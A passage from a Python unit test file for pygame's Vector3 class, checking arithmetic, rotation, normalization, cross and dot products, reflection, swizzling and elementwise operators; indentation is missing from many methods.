        b[slice(1,2)] = [2.2]
        c[1:2:] = (2.2,)
        self.assertEqual(a, b)
        self.assertEqual(a, c)
        # slice assignment must not degrade the type to a plain sequence
        self.assertEqual(type(a), type(self.v1))
        self.assertEqual(type(b), type(self.v1))
        self.assertEqual(type(c), type(self.v1))
def testAdd(self):
v3 = self.v1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.v2.x)
self.assertEqual(v3.y, self.v1.y + self.v2.y)
self.assertEqual(v3.z, self.v1.z + self.v2.z)
v3 = self.v1 + self.t2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.t2[0])
self.assertEqual(v3.y, self.v1.y + self.t2[1])
self.assertEqual(v3.z, self.v1.z + self.t2[2])
v3 = self.v1 + self.l2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.l2[0])
self.assertEqual(v3.y, self.v1.y + self.l2[1])
self.assertEqual(v3.z, self.v1.z + self.l2[2])
v3 = self.t1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.t1[0] + self.v2.x)
self.assertEqual(v3.y, self.t1[1] + self.v2.y)
self.assertEqual(v3.z, self.t1[2] + self.v2.z)
v3 = self.l1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.l1[0] + self.v2.x)
self.assertEqual(v3.y, self.l1[1] + self.v2.y)
self.assertEqual(v3.z, self.l1[2] + self.v2.z)
def testSub(self):
v3 = self.v1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.v2.x)
self.assertEqual(v3.y, self.v1.y - self.v2.y)
self.assertEqual(v3.z, self.v1.z - self.v2.z)
v3 = self.v1 - self.t2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.t2[0])
self.assertEqual(v3.y, self.v1.y - self.t2[1])
self.assertEqual(v3.z, self.v1.z - self.t2[2])
v3 = self.v1 - self.l2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.l2[0])
self.assertEqual(v3.y, self.v1.y - self.l2[1])
self.assertEqual(v3.z, self.v1.z - self.l2[2])
v3 = self.t1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.t1[0] - self.v2.x)
self.assertEqual(v3.y, self.t1[1] - self.v2.y)
self.assertEqual(v3.z, self.t1[2] - self.v2.z)
v3 = self.l1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.l1[0] - self.v2.x)
self.assertEqual(v3.y, self.l1[1] - self.v2.y)
self.assertEqual(v3.z, self.l1[2] - self.v2.z)
def testScalarMultiplication(self):
v = self.s1 * self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.s1 * self.v1.x)
self.assertEqual(v.y, self.s1 * self.v1.y)
self.assertEqual(v.z, self.s1 * self.v1.z)
v = self.v1 * self.s2
self.assertEqual(v.x, self.v1.x * self.s2)
self.assertEqual(v.y, self.v1.y * self.s2)
self.assertEqual(v.z, self.v1.z * self.s2)
def testScalarDivision(self):
v = self.v1 / self.s1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertAlmostEqual(v.x, self.v1.x / self.s1)
self.assertAlmostEqual(v.y, self.v1.y / self.s1)
self.assertAlmostEqual(v.z, self.v1.z / self.s1)
v = self.v1 // self.s2
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.v1.x // self.s2)
self.assertEqual(v.y, self.v1.y // self.s2)
self.assertEqual(v.z, self.v1.z // self.s2)
def testBool(self):
self.assertEqual(bool(self.zeroVec), False)
self.assertEqual(bool(self.v1), True)
self.assertTrue(not self.zeroVec)
self.assertTrue(self.v1)
def testUnary(self):
v = +self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.v1.x)
self.assertEqual(v.y, self.v1.y)
self.assertEqual(v.z, self.v1.z)
self.assertNotEqual(id(v), id(self.v1))
v = -self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, -self.v1.x)
self.assertEqual(v.y, -self.v1.y)
self.assertEqual(v.z, -self.v1.z)
self.assertNotEqual(id(v), id(self.v1))
def testCompare(self):
int_vec = Vector3(3, -2, 13)
flt_vec = Vector3(3.0, -2.0, 13.)
zero_vec = Vector3(0, 0, 0)
self.assertEqual(int_vec == flt_vec, True)
self.assertEqual(int_vec != flt_vec, False)
self.assertEqual(int_vec != zero_vec, True)
self.assertEqual(flt_vec == zero_vec, False)
self.assertEqual(int_vec == (3, -2, 13), True)
self.assertEqual(int_vec != (3, -2, 13), False)
self.assertEqual(int_vec != [0, 0], True)
self.assertEqual(int_vec == [0, 0], False)
self.assertEqual(int_vec != 5, True)
self.assertEqual(int_vec == 5, False)
self.assertEqual(int_vec != [3, -2, 0, 1], True)
self.assertEqual(int_vec == [3, -2, 0, 1], False)
def testStr(self):
v = Vector3(1.2, 3.4, 5.6)
self.assertEqual(str(v), "[1.2, 3.4, 5.6]")
def testRepr(self):
v = Vector3(1.2, 3.4, -9.6)
self.assertEqual(v.__repr__(), "<Vector3(1.2, 3.4, -9.6)>")
self.assertEqual(v, Vector3(v.__repr__()))
def testIter(self):
it = self.v1.__iter__()
if PY3:
next_ = it.__next__
else:
next_ = it.next
self.assertEqual(next_(), self.v1[0])
self.assertEqual(next_(), self.v1[1])
self.assertEqual(next_(), self.v1[2])
self.assertRaises(StopIteration, lambda : next_())
it1 = self.v1.__iter__()
it2 = self.v1.__iter__()
self.assertNotEqual(id(it1), id(it2))
self.assertEqual(id(it1), id(it1.__iter__()))
self.assertEqual(list(it1), list(it2));
self.assertEqual(list(self.v1.__iter__()), self.l1)
idx = 0
for val in self.v1:
self.assertEqual(val, self.v1[idx])
idx += 1
    def test_rotate(self):
        """rotate(angle, axis) returns a rotated copy; the source vector is
        untouched and angles wrap at 360 degrees."""
        v1 = Vector3(1, 0, 0)
        axis = Vector3(0, 1, 0)
        v2 = v1.rotate(90, axis)
        v3 = v1.rotate(90 + 360, axis)
        # the source vector is unchanged
        self.assertEqual(v1.x, 1)
        self.assertEqual(v1.y, 0)
        self.assertEqual(v1.z, 0)
        self.assertEqual(v2.x, 0)
        self.assertEqual(v2.y, 0)
        self.assertEqual(v2.z, -1)
        # an extra full turn makes no difference
        self.assertEqual(v3.x, v2.x)
        self.assertEqual(v3.y, v2.y)
        self.assertEqual(v3.z, v2.z)
        v1 = Vector3(-1, -1, -1)
        v2 = v1.rotate(-90, axis)
        self.assertEqual(v2.x, 1)
        self.assertEqual(v2.y, -1)
        self.assertEqual(v2.z, -1)
        v2 = v1.rotate(360, axis)
        self.assertEqual(v1.x, v2.x)
        self.assertEqual(v1.y, v2.y)
        self.assertEqual(v1.z, v2.z)
        v2 = v1.rotate(0, axis)
        self.assertEqual(v1.x, v2.x)
        self.assertEqual(v1.y, v2.y)
        self.assertEqual(v1.z, v2.z)
        # issue 214
        self.assertEqual(Vector3(0, 1, 0).rotate(359.9999999, Vector3(0, 0, 1)),
                         Vector3(0, 1, 0))
def test_rotate_ip(self):
v = Vector3(1, 0, 0)
axis = Vector3(0, 1, 0)
self.assertEqual(v.rotate_ip(90, axis), None)
self.assertEqual(v.x, 0)
self.assertEqual(v.y, 0)
self.assertEqual(v.z, -1)
v = Vector3(-1, -1, 1)
v.rotate_ip(-90, axis)
self.assertEqual(v.x, -1)
self.assertEqual(v.y, -1)
self.assertEqual(v.z, -1)
    def test_rotate_x(self):
        """rotate_x rotates about the x axis; a vector on that axis is invariant."""
        v1 = Vector3(1, 0, 0)
        v2 = v1.rotate_x(90)
        v3 = v1.rotate_x(90 + 360)
        # the source vector is unchanged
        self.assertEqual(v1.x, 1)
        self.assertEqual(v1.y, 0)
        self.assertEqual(v1.z, 0)
        # (1, 0, 0) lies on the rotation axis, so it does not move
        self.assertEqual(v2.x, 1)
        self.assertEqual(v2.y, 0)
        self.assertEqual(v2.z, 0)
        # an extra full turn makes no difference
        self.assertEqual(v3.x, v2.x)
        self.assertEqual(v3.y, v2.y)
        self.assertEqual(v3.z, v2.z)
        v1 = Vector3(-1, -1, -1)
        v2 = v1.rotate_x(-90)
        self.assertEqual(v2.x, -1)
        self.assertAlmostEqual(v2.y, -1)
        self.assertAlmostEqual(v2.z, 1)
        v2 = v1.rotate_x(360)
        self.assertAlmostEqual(v1.x, v2.x)
        self.assertAlmostEqual(v1.y, v2.y)
        self.assertAlmostEqual(v1.z, v2.z)
        v2 = v1.rotate_x(0)
        self.assertEqual(v1.x, v2.x)
        self.assertAlmostEqual(v1.y, v2.y)
        self.assertAlmostEqual(v1.z, v2.z)
    def test_rotate_x_ip(self):
        """rotate_x_ip rotates in place about the x axis and returns None."""
        v = Vector3(1, 0, 0)
        self.assertEqual(v.rotate_x_ip(90), None)
        # (1, 0, 0) lies on the rotation axis, so it does not move
        self.assertEqual(v.x, 1)
        self.assertEqual(v.y, 0)
        self.assertEqual(v.z, 0)
        v = Vector3(-1, -1, 1)
        v.rotate_x_ip(-90)
        self.assertEqual(v.x, -1)
        self.assertAlmostEqual(v.y, 1)
        self.assertAlmostEqual(v.z, 1)
    def test_rotate_y(self):
        """rotate_y rotates about the y axis, leaving the y component alone."""
        v1 = Vector3(1, 0, 0)
        v2 = v1.rotate_y(90)
        v3 = v1.rotate_y(90 + 360)
        # the source vector is unchanged
        self.assertEqual(v1.x, 1)
        self.assertEqual(v1.y, 0)
        self.assertEqual(v1.z, 0)
        self.assertAlmostEqual(v2.x, 0)
        self.assertEqual(v2.y, 0)
        self.assertAlmostEqual(v2.z, -1)
        # an extra full turn makes no difference
        self.assertAlmostEqual(v3.x, v2.x)
        self.assertEqual(v3.y, v2.y)
        self.assertAlmostEqual(v3.z, v2.z)
        v1 = Vector3(-1, -1, -1)
        v2 = v1.rotate_y(-90)
        self.assertAlmostEqual(v2.x, 1)
        self.assertEqual(v2.y, -1)
        self.assertAlmostEqual(v2.z, -1)
        v2 = v1.rotate_y(360)
        self.assertAlmostEqual(v1.x, v2.x)
        self.assertEqual(v1.y, v2.y)
        self.assertAlmostEqual(v1.z, v2.z)
        v2 = v1.rotate_y(0)
        self.assertEqual(v1.x, v2.x)
        self.assertEqual(v1.y, v2.y)
        self.assertEqual(v1.z, v2.z)
    def test_rotate_y_ip(self):
        """rotate_y_ip rotates in place about the y axis and returns None."""
        v = Vector3(1, 0, 0)
        self.assertEqual(v.rotate_y_ip(90), None)
        self.assertAlmostEqual(v.x, 0)
        self.assertEqual(v.y, 0)
        self.assertAlmostEqual(v.z, -1)
        v = Vector3(-1, -1, 1)
        v.rotate_y_ip(-90)
        self.assertAlmostEqual(v.x, -1)
        self.assertEqual(v.y, -1)
        self.assertAlmostEqual(v.z, -1)
    def test_rotate_z(self):
        """rotate_z rotates about the z axis, leaving the z component alone."""
        v1 = Vector3(1, 0, 0)
        v2 = v1.rotate_z(90)
        v3 = v1.rotate_z(90 + 360)
        # the source vector is unchanged
        self.assertEqual(v1.x, 1)
        self.assertEqual(v1.y, 0)
        self.assertEqual(v1.z, 0)
        self.assertAlmostEqual(v2.x, 0)
        self.assertAlmostEqual(v2.y, 1)
        self.assertEqual(v2.z, 0)
        # an extra full turn makes no difference
        self.assertAlmostEqual(v3.x, v2.x)
        self.assertAlmostEqual(v3.y, v2.y)
        self.assertEqual(v3.z, v2.z)
        v1 = Vector3(-1, -1, -1)
        v2 = v1.rotate_z(-90)
        self.assertAlmostEqual(v2.x, -1)
        self.assertAlmostEqual(v2.y, 1)
        self.assertEqual(v2.z, -1)
        v2 = v1.rotate_z(360)
        self.assertAlmostEqual(v1.x, v2.x)
        self.assertAlmostEqual(v1.y, v2.y)
        self.assertEqual(v1.z, v2.z)
        v2 = v1.rotate_z(0)
        self.assertAlmostEqual(v1.x, v2.x)
        self.assertAlmostEqual(v1.y, v2.y)
        self.assertEqual(v1.z, v2.z)
    def test_rotate_z_ip(self):
        """rotate_z_ip rotates in place about the z axis and returns None."""
        v = Vector3(1, 0, 0)
        self.assertEqual(v.rotate_z_ip(90), None)
        self.assertAlmostEqual(v.x, 0)
        self.assertAlmostEqual(v.y, 1)
        self.assertEqual(v.z, 0)
        v = Vector3(-1, -1, 1)
        v.rotate_z_ip(-90)
        self.assertAlmostEqual(v.x, -1)
        self.assertAlmostEqual(v.y, 1)
        self.assertEqual(v.z, 1)
    def test_normalize(self):
        """normalize returns a unit-length copy parallel to the original;
        the zero vector cannot be normalized."""
        v = self.v1.normalize()
        # length is 1
        self.assertAlmostEqual(v.x * v.x + v.y * v.y + v.z * v.z, 1.)
        # v1 is unchanged
        self.assertEqual(self.v1.x, self.l1[0])
        self.assertEqual(self.v1.y, self.l1[1])
        self.assertEqual(self.v1.z, self.l1[2])
        # v is parallel to v1 (tested via a vanishing cross product)
        cross = ((self.v1.y * v.z - self.v1.z * v.y) ** 2 +
                 (self.v1.z * v.x - self.v1.x * v.z) ** 2 +
                 (self.v1.x * v.y - self.v1.y * v.x) ** 2)
        self.assertAlmostEqual(cross, 0.)
        self.assertRaises(ValueError, lambda : self.zeroVec.normalize())
    def test_normalize_ip(self):
        """normalize_ip scales in place to unit length and returns None;
        the zero vector cannot be normalized."""
        v = +self.v1
        # v has length != 1 before normalizing
        self.assertNotEqual(v.x * v.x + v.y * v.y + v.z * v.z, 1.)
        # inplace operations should return None
        self.assertEqual(v.normalize_ip(), None)
        # length is 1
        self.assertAlmostEqual(v.x * v.x + v.y * v.y + v.z * v.z, 1.)
        # v is parallel to v1 (tested via a vanishing cross product)
        cross = ((self.v1.y * v.z - self.v1.z * v.y) ** 2 +
                 (self.v1.z * v.x - self.v1.x * v.z) ** 2 +
                 (self.v1.x * v.y - self.v1.y * v.x) ** 2)
        self.assertAlmostEqual(cross, 0.)
        self.assertRaises(ValueError, lambda : self.zeroVec.normalize_ip())
def test_is_normalized(self):
self.assertEqual(self.v1.is_normalized(), False)
v = self.v1.normalize()
self.assertEqual(v.is_normalized(), True)
self.assertEqual(self.e2.is_normalized(), True)
self.assertEqual(self.zeroVec.is_normalized(), False)
def test_cross(self):
def cross(a, b):
return Vector3(a[1] * b[2] - a[2] * b[1],
a[2] * b[0] - a[0] * b[2],
a[0] * b[1] - a[1] * b[0])
self.assertEqual(self.v1.cross(self.v2), cross(self.v1, self.v2))
self.assertEqual(self.v1.cross(self.l2), cross(self.v1, self.l2))
self.assertEqual(self.v1.cross(self.t2), cross(self.v1, self.t2))
self.assertEqual(self.v1.cross(self.v2), -self.v2.cross(self.v1))
self.assertEqual(self.v1.cross(self.v1), self.zeroVec)
def test_dot(self):
self.assertAlmostEqual(self.v1.dot(self.v2),
self.v1.x * self.v2.x + self.v1.y * self.v2.y + self.v1.z * self.v2.z)
self.assertAlmostEqual(self.v1.dot(self.l2),
self.v1.x * self.l2[0] + self.v1.y * self.l2[1] + self.v1.z * self.l2[2])
self.assertAlmostEqual(self.v1.dot(self.t2),
self.v1.x * self.t2[0] + self.v1.y * self.t2[1] + self.v1.z * self.t2[2])
self.assertAlmostEqual(self.v1.dot(self.v2), self.v2.dot(self.v1))
self.assertAlmostEqual(self.v1.dot(self.v2), self.v1 * self.v2)
    def test_angle_to(self):
        """angle_to returns the angle between two vectors in degrees."""
        self.assertEqual(Vector3(1, 1, 0).angle_to((-1, 1, 0)), 90)
        self.assertEqual(Vector3(1, 0, 0).angle_to((0, 0, -1)), 90)
        self.assertEqual(Vector3(1, 0, 0).angle_to((-1, 0, 1)), 135)
        self.assertEqual(abs(Vector3(1, 0, 1).angle_to((-1, 0, -1))), 180)
        # if we rotate v1 by the angle_to v2 around their cross product
        # we should look in the same direction
        self.assertEqual(self.v1.rotate(self.v1.angle_to(self.v2), self.v1.cross(self.v2)).normalize(),
                         self.v2.normalize())
def test_scale_to_length(self):
v = Vector3(1, 1, 1)
v.scale_to_length(2.5)
self.assertEqual(v, Vector3(2.5, 2.5, 2.5) / math.sqrt(3))
self.assertRaises(ValueError, lambda : self.zeroVec.scale_to_length(1))
self.assertEqual(v.scale_to_length(0), None)
self.assertEqual(v, self.zeroVec)
def test_length(self):
self.assertEqual(Vector3(3, 4, 5).length(), math.sqrt(3 * 3 + 4 * 4 + 5 * 5))
self.assertEqual(Vector3(-3, 4, 5).length(), math.sqrt(-3 * -3 + 4 * 4 + 5 * 5))
self.assertEqual(self.zeroVec.length(), 0)
def test_length_squared(self):
self.assertEqual(Vector3(3, 4, 5).length_squared(), 3 * 3 + 4 * 4 + 5 * 5)
self.assertEqual(Vector3(-3, 4, 5).length_squared(), -3 * -3 + 4 * 4 + 5 * 5)
self.assertEqual(self.zeroVec.length_squared(), 0)
def test_reflect(self):
v = Vector3(1, -1, 1)
n = Vector3(0, 1, 0)
self.assertEqual(v.reflect(n), Vector3(1, 1, 1))
self.assertEqual(v.reflect(3*n), v.reflect(n))
self.assertEqual(v.reflect(-v), -v)
self.assertRaises(ValueError, lambda : v.reflect(self.zeroVec))
def test_reflect_ip(self):
v1 = Vector3(1, -1, 1)
v2 = Vector3(v1)
n = Vector3(0, 1, 0)
self.assertEqual(v2.reflect_ip(n), None)
self.assertEqual(v2, Vector3(1, 1, 1))
v2 = Vector3(v1)
v2.reflect_ip(3*n)
self.assertEqual(v2, v1.reflect(n))
v2 = Vector3(v1)
v2.reflect_ip(-v1)
self.assertEqual(v2, -v1)
self.assertRaises(ValueError, lambda : v2.reflect_ip(self.zeroVec))
def test_distance_to(self):
diff = self.v1 - self.v2
self.assertEqual(self.e1.distance_to(self.e2), math.sqrt(2))
self.assertEqual(self.v1.distance_to(self.v2),
math.sqrt(diff.x * diff.x + diff.y * diff.y + diff.z * diff.z))
self.assertEqual(self.v1.distance_to(self.v1), 0)
self.assertEqual(self.v1.distance_to(self.v2),
self.v2.distance_to(self.v1))
def test_distance_squared_to(self):
diff = self.v1 - self.v2
self.assertEqual(self.e1.distance_squared_to(self.e2), 2)
self.assertAlmostEqual(self.v1.distance_squared_to(self.v2),
diff.x * diff.x + diff.y * diff.y + diff.z * diff.z)
self.assertEqual(self.v1.distance_squared_to(self.v1), 0)
self.assertEqual(self.v1.distance_squared_to(self.v2),
self.v2.distance_squared_to(self.v1))
    def test_swizzle(self):
        """Swizzle attributes read and write arbitrary component orderings;
        swizzling can be toggled globally via pygame.math."""
        self.assertTrue(hasattr(pygame.math, "enable_swizzling"))
        self.assertTrue(hasattr(pygame.math, "disable_swizzling"))
        # swizzling enabled by default
        pygame.math.disable_swizzling()
        self.assertRaises(AttributeError, lambda : self.v1.yx)
        pygame.math.enable_swizzling()
        self.assertEqual(self.v1.yxz, (self.v1.y, self.v1.x, self.v1.z))
        # arbitrarily long swizzles repeat components
        self.assertEqual(self.v1.xxyyzzxyz, (self.v1.x, self.v1.x, self.v1.y,
                                             self.v1.y, self.v1.z, self.v1.z,
                                             self.v1.x, self.v1.y, self.v1.z))
        self.v1.xyz = self.t2
        self.assertEqual(self.v1, self.t2)
        # write through a permuted swizzle scatters the right-hand side
        self.v1.zxy = self.t2
        self.assertEqual(self.v1, (self.t2[1], self.t2[2], self.t2[0]))
        self.v1.yz = self.t2[:2]
        self.assertEqual(self.v1, (self.t2[1], self.t2[0], self.t2[1]))
        # swizzle assignment must not change the vector's type
        self.assertEqual(type(self.v1), Vector3)
@unittest.skipIf(IS_PYPY, "known pypy failure")
def test_invalid_swizzle(self):
def invalidSwizzleX():
Vector3().xx = (1, 2)
def invalidSwizzleY():
Vector3().yy = (1, 2)
def invalidSwizzleZ():
Vector3().zz = (1, 2)
def invalidSwizzleW():
Vector3().ww = (1, 2)
self.assertRaises(AttributeError, invalidSwizzleX)
self.assertRaises(AttributeError, invalidSwizzleY)
self.assertRaises(AttributeError, invalidSwizzleZ)
self.assertRaises(AttributeError, invalidSwizzleW)
def invalidAssignment():
Vector3().xy = 3
self.assertRaises(TypeError, invalidAssignment)
def test_swizzle_return_types(self):
self.assertEqual(type(self.v1.x), float)
self.assertEqual(type(self.v1.xy), Vector2)
self.assertEqual(type(self.v1.xyz), Vector3)
# but we don't have vector4 or above... so tuple.
self.assertEqual(type(self.v1.xyxy), tuple)
self.assertEqual(type(self.v1.xyxyx), tuple)
def test_dir_works(self):
# not every single one of the attributes...
attributes = set(['lerp', 'normalize', 'normalize_ip', 'reflect', 'slerp', 'x', 'y'])
# check if this selection of attributes are all there.
self.assertTrue(attributes.issubset(set(dir(self.v1))))
    def test_elementwise(self):
        """elementwise() distributes every arithmetic and comparison operator
        across components — against scalars, vectors and other elementwise
        proxies — and propagates ValueError/ZeroDivisionError from the
        per-component operations."""
        # behaviour for "elementwise op scalar"
        self.assertEqual(self.v1.elementwise() + self.s1,
                         (self.v1.x + self.s1, self.v1.y + self.s1, self.v1.z + self.s1))
        self.assertEqual(self.v1.elementwise() - self.s1,
                         (self.v1.x - self.s1, self.v1.y - self.s1, self.v1.z - self.s1))
        self.assertEqual(self.v1.elementwise() * self.s2,
                         (self.v1.x * self.s2, self.v1.y * self.s2, self.v1.z * self.s2))
        self.assertEqual(self.v1.elementwise() / self.s2,
                         (self.v1.x / self.s2, self.v1.y / self.s2, self.v1.z / self.s2))
        self.assertEqual(self.v1.elementwise() // self.s1,
                         (self.v1.x // self.s1, self.v1.y // self.s1, self.v1.z // self.s1))
        self.assertEqual(self.v1.elementwise() ** self.s1,
                         (self.v1.x ** self.s1, self.v1.y ** self.s1, self.v1.z ** self.s1))
        self.assertEqual(self.v1.elementwise() % self.s1,
                         (self.v1.x % self.s1, self.v1.y % self.s1, self.v1.z % self.s1))
        # comparisons against a scalar hold only if they hold for EVERY component
        self.assertEqual(self.v1.elementwise() > self.s1,
                         self.v1.x > self.s1 and self.v1.y > self.s1 and self.v1.z > self.s1)
        self.assertEqual(self.v1.elementwise() < self.s1,
                         self.v1.x < self.s1 and self.v1.y < self.s1 and self.v1.z < self.s1)
        self.assertEqual(self.v1.elementwise() == self.s1,
                         self.v1.x == self.s1 and self.v1.y == self.s1 and self.v1.z == self.s1)
        self.assertEqual(self.v1.elementwise() != self.s1,
                         self.v1.x != self.s1 and self.v1.y != self.s1 and self.v1.z != self.s1)
        self.assertEqual(self.v1.elementwise() >= self.s1,
                         self.v1.x >= self.s1 and self.v1.y >= self.s1 and self.v1.z >= self.s1)
        self.assertEqual(self.v1.elementwise() <= self.s1,
                         self.v1.x <= self.s1 and self.v1.y <= self.s1 and self.v1.z <= self.s1)
        # behaviour for "scalar op elementwise"
        self.assertEqual(5 + self.v1.elementwise(), Vector3(5, 5, 5) + self.v1)
        self.assertEqual(3.5 - self.v1.elementwise(), Vector3(3.5, 3.5, 3.5) - self.v1)
        self.assertEqual(7.5 * self.v1.elementwise() , 7.5 * self.v1)
        self.assertEqual(-3.5 / self.v1.elementwise(), (-3.5 / self.v1.x, -3.5 / self.v1.y, -3.5 / self.v1.z))
        self.assertEqual(-3.5 // self.v1.elementwise(), (-3.5 // self.v1.x, -3.5 // self.v1.y, -3.5 // self.v1.z))
        self.assertEqual(-3.5 ** self.v1.elementwise(), (-3.5 ** self.v1.x, -3.5 ** self.v1.y, -3.5 ** self.v1.z))
        self.assertEqual(3 % self.v1.elementwise(), (3 % self.v1.x, 3 % self.v1.y, 3 % self.v1.z))
        self.assertEqual(2 < self.v1.elementwise(), 2 < self.v1.x and 2 < self.v1.y and 2 < self.v1.z)
        self.assertEqual(2 > self.v1.elementwise(), 2 > self.v1.x and 2 > self.v1.y and 2 > self.v1.z)
        self.assertEqual(1 == self.v1.elementwise(), 1 == self.v1.x and 1 == self.v1.y and 1 == self.v1.z)
        self.assertEqual(1 != self.v1.elementwise(), 1 != self.v1.x and 1 != self.v1.y and 1 != self.v1.z)
        self.assertEqual(2 <= self.v1.elementwise(), 2 <= self.v1.x and 2 <= self.v1.y and 2 <= self.v1.z)
        self.assertEqual(-7 >= self.v1.elementwise(), -7 >= self.v1.x and -7 >= self.v1.y and -7 >= self.v1.z)
        self.assertEqual(-7 != self.v1.elementwise(), -7 != self.v1.x and -7 != self.v1.y and -7 != self.v1.z)
        # behaviour for "elementwise op vector"
        self.assertEqual(type(self.v1.elementwise() * self.v2), type(self.v1))
        self.assertEqual(self.v1.elementwise() + self.v2, self.v1 + self.v2)
        self.assertEqual(self.v1.elementwise() + self.v2, self.v1 + self.v2)
        self.assertEqual(self.v1.elementwise() - self.v2, self.v1 - self.v2)
        self.assertEqual(self.v1.elementwise() * self.v2, (self.v1.x * self.v2.x, self.v1.y * self.v2.y, self.v1.z * self.v2.z))
        self.assertEqual(self.v1.elementwise() / self.v2, (self.v1.x / self.v2.x, self.v1.y / self.v2.y, self.v1.z / self.v2.z))
        self.assertEqual(self.v1.elementwise() // self.v2, (self.v1.x // self.v2.x, self.v1.y // self.v2.y, self.v1.z // self.v2.z))
        self.assertEqual(self.v1.elementwise() ** self.v2, (self.v1.x ** self.v2.x, self.v1.y ** self.v2.y, self.v1.z ** self.v2.z))
        self.assertEqual(self.v1.elementwise() % self.v2, (self.v1.x % self.v2.x, self.v1.y % self.v2.y, self.v1.z % self.v2.z))
        self.assertEqual(self.v1.elementwise() > self.v2, self.v1.x > self.v2.x and self.v1.y > self.v2.y and self.v1.z > self.v2.z)
        self.assertEqual(self.v1.elementwise() < self.v2, self.v1.x < self.v2.x and self.v1.y < self.v2.y and self.v1.z < self.v2.z)
        self.assertEqual(self.v1.elementwise() >= self.v2, self.v1.x >= self.v2.x and self.v1.y >= self.v2.y and self.v1.z >= self.v2.z)
        self.assertEqual(self.v1.elementwise() <= self.v2, self.v1.x <= self.v2.x and self.v1.y <= self.v2.y and self.v1.z <= self.v2.z)
        self.assertEqual(self.v1.elementwise() == self.v2, self.v1.x == self.v2.x and self.v1.y == self.v2.y and self.v1.z == self.v2.z)
        self.assertEqual(self.v1.elementwise() != self.v2, self.v1.x != self.v2.x and self.v1.y != self.v2.y and self.v1.z != self.v2.z)
        # behaviour for "vector op elementwise"
        self.assertEqual(self.v2 + self.v1.elementwise(), self.v2 + self.v1)
        self.assertEqual(self.v2 - self.v1.elementwise(), self.v2 - self.v1)
        self.assertEqual(self.v2 * self.v1.elementwise(), (self.v2.x * self.v1.x, self.v2.y * self.v1.y, self.v2.z * self.v1.z))
        self.assertEqual(self.v2 / self.v1.elementwise(), (self.v2.x / self.v1.x, self.v2.y / self.v1.y, self.v2.z / self.v1.z))
        self.assertEqual(self.v2 // self.v1.elementwise(), (self.v2.x // self.v1.x, self.v2.y // self.v1.y, self.v2.z // self.v1.z))
        self.assertEqual(self.v2 ** self.v1.elementwise(), (self.v2.x ** self.v1.x, self.v2.y ** self.v1.y, self.v2.z ** self.v1.z))
        self.assertEqual(self.v2 % self.v1.elementwise(), (self.v2.x % self.v1.x, self.v2.y % self.v1.y, self.v2.z % self.v1.z))
        self.assertEqual(self.v2 < self.v1.elementwise(), self.v2.x < self.v1.x and self.v2.y < self.v1.y and self.v2.z < self.v1.z)
        self.assertEqual(self.v2 > self.v1.elementwise(), self.v2.x > self.v1.x and self.v2.y > self.v1.y and self.v2.z > self.v1.z)
        self.assertEqual(self.v2 <= self.v1.elementwise(), self.v2.x <= self.v1.x and self.v2.y <= self.v1.y and self.v2.z <= self.v1.z)
        self.assertEqual(self.v2 >= self.v1.elementwise(), self.v2.x >= self.v1.x and self.v2.y >= self.v1.y and self.v2.z >= self.v1.z)
        self.assertEqual(self.v2 == self.v1.elementwise(), self.v2.x == self.v1.x and self.v2.y == self.v1.y and self.v2.z == self.v1.z)
        self.assertEqual(self.v2 != self.v1.elementwise(), self.v2.x != self.v1.x and self.v2.y != self.v1.y and self.v2.z != self.v1.z)
        # behaviour for "elementwise op elementwise"
        self.assertEqual(self.v2.elementwise() + self.v1.elementwise(), self.v2 + self.v1)
        self.assertEqual(self.v2.elementwise() - self.v1.elementwise(), self.v2 - self.v1)
        self.assertEqual(self.v2.elementwise() * self.v1.elementwise(),
                         (self.v2.x * self.v1.x, self.v2.y * self.v1.y, self.v2.z * self.v1.z))
        self.assertEqual(self.v2.elementwise() / self.v1.elementwise(),
                         (self.v2.x / self.v1.x, self.v2.y / self.v1.y, self.v2.z / self.v1.z))
        self.assertEqual(self.v2.elementwise() // self.v1.elementwise(),
                         (self.v2.x // self.v1.x, self.v2.y // self.v1.y, self.v2.z // self.v1.z))
        self.assertEqual(self.v2.elementwise() ** self.v1.elementwise(),
                         (self.v2.x ** self.v1.x, self.v2.y ** self.v1.y, self.v2.z ** self.v1.z))
        self.assertEqual(self.v2.elementwise() % self.v1.elementwise(),
                         (self.v2.x % self.v1.x, self.v2.y % self.v1.y, self.v2.z % self.v1.z))
        self.assertEqual(self.v2.elementwise() < self.v1.elementwise(),
                         self.v2.x < self.v1.x and self.v2.y < self.v1.y and self.v2.z < self.v1.z)
        self.assertEqual(self.v2.elementwise() > self.v1.elementwise(),
                         self.v2.x > self.v1.x and self.v2.y > self.v1.y and self.v2.z > self.v1.z)
        self.assertEqual(self.v2.elementwise() <= self.v1.elementwise(),
                         self.v2.x <= self.v1.x and self.v2.y <= self.v1.y and self.v2.z <= self.v1.z)
        self.assertEqual(self.v2.elementwise() >= self.v1.elementwise(),
                         self.v2.x >= self.v1.x and self.v2.y >= self.v1.y and self.v2.z >= self.v1.z)
        self.assertEqual(self.v2.elementwise() == self.v1.elementwise(),
                         self.v2.x == self.v1.x and self.v2.y == self.v1.y and self.v2.z == self.v1.z)
        self.assertEqual(self.v2.elementwise() != self.v1.elementwise(),
                         self.v2.x != self.v1.x and self.v2.y != self.v1.y and self.v2.z != self.v1.z)
        # other behaviour
